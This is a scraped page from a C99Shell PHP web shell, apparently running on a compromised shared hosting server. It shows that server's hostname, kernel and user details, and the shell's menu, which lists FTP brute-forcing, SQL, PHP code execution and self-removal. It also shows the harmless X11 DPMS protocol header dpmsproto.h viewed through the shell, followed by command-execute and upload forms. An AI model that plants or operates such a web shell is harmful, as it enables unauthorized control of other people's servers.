!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/5.6.40 

uname -a: Linux cpanel06wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24
01:42:00 EDT 2020 x86_64
 

uid=851(cp949260) gid=853(cp949260) groups=853(cp949260) 

Safe-mode: OFF (not secure)

/usr/include/X11/extensions/   drwxr-xr-x
Free 236.2 GB of 981.82 GB (24.06%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     dpmsproto.h (4.78 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/*****************************************************************

Copyright (c) 1996 Digital Equipment Corporation, Maynard, Massachusetts.

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software.

The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.  IN NO EVENT SHALL
DIGITAL EQUIPMENT CORPORATION BE LIABLE FOR ANY CLAIM, DAMAGES, INCLUDING,
BUT NOT LIMITED TO CONSEQUENTIAL OR INCIDENTAL DAMAGES, OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

Except as contained in this notice, the name of Digital Equipment Corporation
shall not be used in advertising or otherwise to promote the sale, use or other
dealings in this Software without prior written authorization from Digital
Equipment Corporation.

******************************************************************/

#ifndef _DPMSPROTO_H_
#define _DPMSPROTO_H_

#include <X11/extensions/dpmsconst.h>

#define X_DPMSGetVersion    0
#define X_DPMSCapable        1
#define X_DPMSGetTimeouts    2
#define X_DPMSSetTimeouts    3
#define X_DPMSEnable        4
#define X_DPMSDisable        5
#define X_DPMSForceLevel           6
#define X_DPMSInfo           7

#define DPMSNumberEvents    0

#define DPMSNumberErrors    0


typedef struct {
    CARD8    reqType;    /* always DPMSCode */
    CARD8    dpmsReqType;    /* always X_DPMSGetVersion */
    CARD16    length B16;
    CARD16    majorVersion B16;
    CARD16    minorVersion B16;
} xDPMSGetVersionReq;
#define sz_xDPMSGetVersionReq 8

typedef struct {
    BYTE    type;            /* X_Reply */
    CARD8    pad0;
    CARD16    sequenceNumber B16;
    CARD32    length B32;
    CARD16    majorVersion B16;
    CARD16    minorVersion B16;
    CARD32    pad1 B32;
    CARD32    pad2 B32;
    CARD32    pad3 B32;
    CARD32    pad4 B32;
    CARD32    pad5 B32;
} xDPMSGetVersionReply;
#define sz_xDPMSGetVersionReply 32

typedef struct {
    CARD8    reqType;    /* always DPMSCode */
    CARD8    dpmsReqType;    /* always X_DPMSCapable */
    CARD16    length B16;
} xDPMSCapableReq;
#define sz_xDPMSCapableReq 4

typedef struct {
    BYTE    type;            /* X_Reply */
    CARD8    pad0;
    CARD16    sequenceNumber B16;
    CARD32    length B32;
    BOOL    capable;
    CARD8    pad1;
    CARD16    pad2 B16;
    CARD32    pad3 B32;
    CARD32    pad4 B32;
    CARD32    pad5 B32;
    CARD32    pad6 B32;
    CARD32    pad7 B32;
} xDPMSCapableReply;
#define sz_xDPMSCapableReply 32

typedef struct {
    CARD8    reqType;    /* always DPMSCode */
    CARD8    dpmsReqType;    /* always X_DPMSGetTimeouts */
    CARD16    length B16;
} xDPMSGetTimeoutsReq;
#define sz_xDPMSGetTimeoutsReq 4

typedef struct {
    BYTE    type;            /* X_Reply */
    CARD8    pad0;
    CARD16    sequenceNumber B16;
    CARD32    length B32;
    CARD16    standby B16;
    CARD16    suspend B16;
    CARD16    off B16;
    CARD16    pad1 B16;
    CARD32    pad2 B32;
    CARD32    pad3 B32;
    CARD32    pad4 B32;
    CARD32    pad5 B32;
} xDPMSGetTimeoutsReply;
#define sz_xDPMSGetTimeoutsReply 32

typedef struct {
    CARD8    reqType;    /* always DPMSCode */
    CARD8    dpmsReqType;    /* always X_DPMSSetTimeouts */
    CARD16    length B16;
    CARD16    standby B16;
    CARD16    suspend B16;
    CARD16    off B16;
    CARD16    pad0 B16;
} xDPMSSetTimeoutsReq;
#define sz_xDPMSSetTimeoutsReq 12

typedef struct {
    CARD8    reqType;    /* always DPMSCode */
    CARD8    dpmsReqType;    /* always X_DPMSEnable */
    CARD16    length B16;
} xDPMSEnableReq;
#define sz_xDPMSEnableReq 4

typedef struct {
    CARD8    reqType;    /* always DPMSCode */
    CARD8    dpmsReqType;    /* always X_DPMSDisable */
    CARD16    length B16;
} xDPMSDisableReq;
#define sz_xDPMSDisableReq 4

typedef struct {
    CARD8    reqType;    /* always DPMSCode */
    CARD8    dpmsReqType;    /* always X_DPMSForceLevel */
    CARD16    length B16;
    CARD16    level B16;    /* power level requested */
    CARD16    pad0 B16;
} xDPMSForceLevelReq;
#define sz_xDPMSForceLevelReq 8

typedef struct {
    CARD8    reqType;    /* always DPMSCode */
    CARD8    dpmsReqType;    /* always X_DPMSInfo */
    CARD16    length B16;
} xDPMSInfoReq;
#define sz_xDPMSInfoReq 4

typedef struct {
    BYTE    type;            /* X_Reply */
    CARD8    pad0;
    CARD16    sequenceNumber B16;
    CARD32    length B32;
    CARD16    power_level B16;
    BOOL    state;
    CARD8    pad1;
    CARD32    pad2 B32;
    CARD32    pad3 B32;
    CARD32    pad4 B32;
    CARD32    pad5 B32;
    CARD32    pad6 B32;
} xDPMSInfoReply;
#define sz_xDPMSInfoReply 32

#endif /* _DPMSPROTO_H_ */

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.1974 ]--